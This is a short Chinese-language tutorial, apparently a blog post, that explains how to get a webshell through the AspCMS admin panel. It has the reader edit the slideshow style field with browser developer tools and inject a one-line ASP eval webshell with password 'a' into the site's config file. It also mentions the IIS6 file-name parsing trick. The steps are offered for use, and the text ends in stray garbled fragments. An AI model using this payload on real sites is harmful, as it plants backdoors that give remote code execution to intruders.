aspcms在老版本中能够经过添加模板直接添加asp.可是新版的aspcms中已经限制了添加模板的格式为html,js,css,固然若是是遇到iis6的话仍是能够经过iis6的解析漏洞把文件名改为1.asp;.html这样的格式来拿到shell的.但是若是遇到iis7.5呢?如下是本人本身找到挖掘到的aspcms通杀版本的后台拿shell方法.
一、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”css
二、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就行了。将对应的slidestyle的value的值修改成1%><%Eval(Request (chr(65)))%><%html
三、一句话***,密码a。在/config/AspCms_Config.aspshell
4.ide
管理员漏洞工具